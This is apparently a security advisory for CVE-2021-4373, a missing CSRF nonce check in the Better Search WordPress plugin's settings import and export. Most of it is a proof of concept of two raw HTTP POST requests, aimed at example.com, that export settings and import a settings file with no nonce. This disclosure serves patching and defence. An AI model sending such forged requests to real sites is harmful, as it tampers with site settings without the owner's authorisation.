Better Search < 2.5.3 – CSRF Nonce Bypass in Import/Export | CVE 2021-4373

Description

The plugin did not properly check the CSRF nonces when exporting and importing settings, allowing attackers to make a logged in user with the manage_options capability export and import arbitrary settings by not providing the nonce parameter in the request

Proof of Concept

POST /wp-admin/admin.php?page=bsearch_tools_page HTTP/1.1
Host: example.com
User-Agent: YOLO
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/admin.php?page=bsearch_tools_page
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Origin: https://example.com
Connection: close
Cookie: [admin cookies]
Upgrade-Insecure-Requests: 1

bsearch_action=export_settings&bsearch_export_settings=Export+Settings


POST /wp-admin/admin.php?page=bsearch_tools_page HTTP/1.1
Host: example.com
User-Agent: YOLO
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/wp-admin/admin.php?page=bsearch_tools_page
Content-Type: multipart/form-data; boundary=---------------------------16367323269315448902578822082
Content-Length: 536
Origin: http://example.com
Connection: close
Cookie: [admin cookies]
Upgrade-Insecure-Requests: 1

-----------------------------16367323269315448902578822082
Content-Disposition: form-data; name="import_settings_file"; filename="settings.json"
Content-Type: application/json

{"seamless":0}
-----------------------------16367323269315448902578822082
Content-Disposition: form-data; name="bsearch_import_settings"

Import Settings
-----------------------------16367323269315448902578822082
Content-Disposition: form-data; name="bsearch_action"

import_settings
-----------------------------16367323269315448902578822082--